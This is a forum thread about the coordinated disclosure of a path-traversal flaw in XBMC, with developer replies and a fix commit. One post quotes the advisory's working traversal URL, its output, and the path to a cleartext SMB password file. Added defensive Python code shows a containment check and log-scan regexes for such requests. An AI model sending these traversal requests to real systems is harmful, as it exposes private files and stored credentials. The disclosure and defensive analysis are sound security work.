Security issues in XBMC
#1
I have found several high-risk security issues in XBMC and would like to get in contact with a main developer or someone in charge of XBMC security.

Thanks

Best Regards
Lucas
#2
Just post what you found so they can look at it.
#3
(2012-10-31, 21:58)Martijn Wrote: just post what you found so they can look at it

By posting what I found I'd expose thousands of users running XBMC, and perhaps third parties such as OpenELEC etc.

Are you sure that is what you want?

Br,
Lucas
#4
Any XBMC user that has XBMC directly exposed on the net is a fool Smile
#5
(2012-10-31, 22:01)davilla Wrote: any xbmc users that has xbmc directly exposed on the net is a fool Smile

Alright... that's... professionally said....

I'll coordinate a disclosure with the firm I work for, and post the vulnerabilities I have.
It usually takes about a day, since most vendors want to keep it under the lid until they have a patch.

Do you want them here, or in the bug tracker?

Best regards
Lucas
#6
Any vulnerability will be fixed with a public commit.

We are nearing the beta stage for Frodo, so likely anything (major) you disclose now will be addressed before public release.

If they date back to Eden and are serious enough to warrant a point-release, that would be worth knowing ahead of time. But as davilla said, it would not be wise to expose xbmc publicly, so I'm not sure what "serious enough" would be.
#7
(2012-10-31, 22:14)theuni Wrote: Any vulnerability will be fixed with a public commit.

We are nearing the beta stage for Frodo, so likely anything (major) you disclose now will be addressed before public release.

If they date back to Eden and are serious enough to warrant a point-release, that would be worth knowing ahead of time. But as davilla said, it would not be wise to expose xbmc publicly, so I'm not sure what "serious enough" would be.

True story, not here to argue, your call.
There's a lot of things that shouldn't be exposed, that are exposed.

And yes, this dates back and affects Eden as well.
I'll post it tomorrow.

Best regards
Lucas
#8
Seems like this is going to take a couple of extra days; documents etc. need to go through review for the coordinated disclosure.
Thanks for baring with me.

Best regards
Lucas
#9
Quote: Thanks for baring with me.

I guess I can see how a security issue might be likened to being naked...
#10
You can find the full disclosure at http://www.ioactive.com/pdfs/Security_Advisory_XBMC.pdf
Below is a summary of the file traversal vulnerability, which allows an attacker to read any file on the system with the same privileges as the XBMC process.
Since XBMC stores usernames and passwords in clear text, an attacker might be able to gain further access to the targeted machine with the found credentials.

The file traversal vulnerability can be triggered with (Windows request): http://xbmchost:port/...%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini


---SNIP---
XBMC File traversal vulnerability

Severity: High

Affected:
XBMC 11 => Nightly build 20121028 Windows version
XBMCbuntu / XBMC 11 for Linux
XBMC 11 11.0 for Raspberry Pi
XBMC 11.0 Git:20120702-f3cd288 for Jailbroken AppleTV 2 version (Thanks to Matt "hostess" Andreko for the verification.)

Impact
Remote File traversal allows an attacker to read any file on the targeted system with the same privileges as XBMC.
Since XBMC stores SMB and other credentials in clear text on the computer running the service, an attacker could easily find valid network credentials to gain further access. This could lead to full system compromise, or compromise other systems XBMC has access to.

Request (Windows):
http://xbmchost:port/...%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
Output:
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
aif=MPEGVideo
aifc=MPEGVideo
aiff=MPEGVideo
asf=MPEGVideo
asx=MPEGVideo
au=MPEGVideo
m1v=MPEGVideo
m3u=MPEGVideo
mp2=MPEGVideo
mp2v=MPEGVideo
mp3=MPEGVideo
mpa=MPEGVideo
mpe=MPEGVideo
mpeg=MPEGVideo
mpg=MPEGVideo
mpv2=MPEGVideo
snd=MPEGVideo
wax=MPEGVideo
wm=MPEGVideo
wma=MPEGVideo
wmv=MPEGVideo
wmx=MPEGVideo
wpl=MPEGVideo
wvx=MPEGVideo

XBMC Password file (which is unencrypted): /private/var/mobile/Library/Preferences/XBMC/userdata/passwords.xml
<passwords>
<path>
<from pathversion="1">smb://192.168.1.2/Movies</from>
<to pathversion="1">smb://someuserConfused[email protected]/Movies/</to>
</path>
<path>
<from pathversion="1">smb://192.168.1.2/tv</from>
<to pathversion="1">smb://someuser2Confused[email protected]/tv/</to>
</path>
<path>
<from pathversion="1">smb://192.168.1.2/Music</from>
<to pathversion="1">smb://someuser3Confused[email protected]/Music/</to>
</path>
</passwords>
---SNIP---

Best regards
Lucas
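The traversal request above escapes the served directory because the handler accepts percent-encoded backslashes and never checks that the resolved path still lies inside the web root. The following is an added example, not XBMC/Kodi code and not part of the IOActive advisory, showing the two things a defender wants here: the containment check a file handler should apply before opening a requested path, and a scan over access-log lines that surfaces such attempts after the fact. WEB_ROOT and the SAMPLE_LOG lines are constructed for the example; only the first request string is the one quoted in the advisory.

```python
"""Defensive checks for the path-traversal pattern quoted in the advisory.

Added example, not XBMC/Kodi code and not part of the IOActive advisory.
  1. resolve_under_root(): the containment check a file handler (web server
     or VFS layer) should apply before opening a requested path.
  2. find_traversal_attempts(): a scan over access-log lines for encoded
     ".." sequences, so existing exposure can be found after the fact.
WEB_ROOT and the SAMPLE_LOG lines are constructed for this example.
"""
import posixpath
import re
from urllib.parse import unquote

# Hypothetical document root; XBMC's real web root is not modelled here.
WEB_ROOT = "/opt/xbmc/web"

# The Windows request quoted in the advisory (post #10 / the PDF).
ADVISORY_REQUEST = "/...%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini"


def decode_request_path(raw: str) -> str:
    """Turn the raw request target into one canonical, slash-separated path.

    Percent-decoding is repeated until stable so a double-encoded "%252e"
    cannot slip past a single decode, and backslashes are treated as
    separators because Windows hosts accept both.
    """
    path = raw.split("?", 1)[0]           # drop any query string
    for _ in range(4):                    # bounded: stop when decoding is a no-op
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def resolve_under_root(root: str, raw_request_path: str):
    """Map a request to a filesystem path, or return None if it escapes root.

    The request is joined to the root *before* normalisation: normalising
    "/.../../../x" on its own silently drops the leading ".." segments and
    would make the traversal look harmless.
    """
    root = posixpath.normpath(root)
    rel = decode_request_path(raw_request_path)
    if "\x00" in rel:                     # embedded NUL: never a legitimate file
        return None
    target = posixpath.normpath(posixpath.join(root, rel.lstrip("/")))
    if posixpath.commonpath([root, target]) != root:
        return None                       # resolved outside the served tree
    return target


# Matches ".." (plain or percent-encoded, once or twice) followed by a separator.
TRAVERSAL_RE = re.compile(
    r"(?i)(?:\.\.|%2e%2e|%252e%252e)(?:/|\\|%2f|%5c|%252f|%255c)"
)
# Common Log Format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed access-log lines; the second path is the advisory's request.
SAMPLE_LOG = [
    '192.168.1.50 - - [31/Oct/2012:21:58:00 +0100] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.7 - - [31/Oct/2012:22:01:13 +0100] "GET ' + ADVISORY_REQUEST + ' HTTP/1.1" 200 1243',
    '10.0.0.7 - - [31/Oct/2012:22:01:20 +0100] "GET /..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048',
    '192.168.1.50 - - [31/Oct/2012:22:05:00 +0100] "GET /images/logo.png HTTP/1.1" 200 9100',
]


def find_traversal_attempts(log_lines):
    """Return (client, path, status) for requests carrying a traversal sequence.

    Both the raw and the decoded path are tested so that a mixed encoding
    such as "..%5C" is caught either way. A 200 status on a hit is the
    alarming case: the server actually served the file.
    """
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        if TRAVERSAL_RE.search(path) or TRAVERSAL_RE.search(unquote(path)):
            hits.append((m.group("client"), path, int(m.group("status"))))
    return hits


if __name__ == "__main__":
    for req in ("/index.html", ADVISORY_REQUEST, "/..%252F..%252Fetc/passwd"):
        print(f"{req!r:70} -> {resolve_under_root(WEB_ROOT, req)}")
    for client, path, status in find_traversal_attempts(SAMPLE_LOG):
        print(f"traversal attempt from {client}: {path} (status {status})")
```

The containment check is the part that matters for the fix: decoding, separator unification and the root join all happen before normalisation, and the decision is made on the resolved path rather than on the presence of ".." in the input, so encoding tricks do not change the outcome. The log scan is the complement for anyone who had the web interface reachable before patching: a hit with status 200 means the traversal was served, and the credentials in passwords.xml should be treated as exposed.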
#11
This was known for a very very long time Smile

And it is corrected in the latest Frodo nightly with added security on the VFS handler.

When I first reported this, the official answer was "don't put your XBMC on the Internet, it's not secure" Smile

Check: http://forum.xbmc.org/showthread.php?tid=81173
#12
It's the same vulnerability but in a different spot. I'll look into it.
#13
Should be fixed with https://github.com/xbmc/xbmc/commit/bdff...ab52a65335. See how easy it is if you just post your findings here? Wink

PS: You mentioned "several high security risks" in your initial post. Was this the only one or are there others you don't (want to?) share with us?
#14
But then there would be no official document and no drama
#15
(2012-11-04, 13:56)Tolriq Wrote: This was known for a very very long time Smile

And it is corrected in the latest Frodo nightly with added security on the VFS handler.

When I first reported this, the official answer was "don't put your XBMC on the Internet, it's not secure" Smile

Check: http://forum.xbmc.org/showthread.php?tid=81173

The nightly was still vulnerable last time I checked.
And if it has been known for a while, perhaps it's time to fix it?

Best regards
Lucas

(2012-11-04, 15:45)amet Wrote: But then there would be no official document and no drama

You can also say, no official document, nothing gets done.

Best regards
Lucas
(2012-11-04, 15:21)Montellese Wrote: Should be fixed with https://github.com/xbmc/xbmc/commit/bdff...ab52a65335. See how easy it is if you just post your findings here? Wink

PS: You mentioned "several high security risks" in your initial post. Was this the only one or are there others you don't (want to?) share with us?

Nice, way faster than most Smile

Yeah, currently investigating whether it's exploitable or not. At least a DoS. If it's just a DoS I'll post it in the bug forums.
There are two possible issues that are in the 'works'.

You'll know when I know.

Best regards
Lucas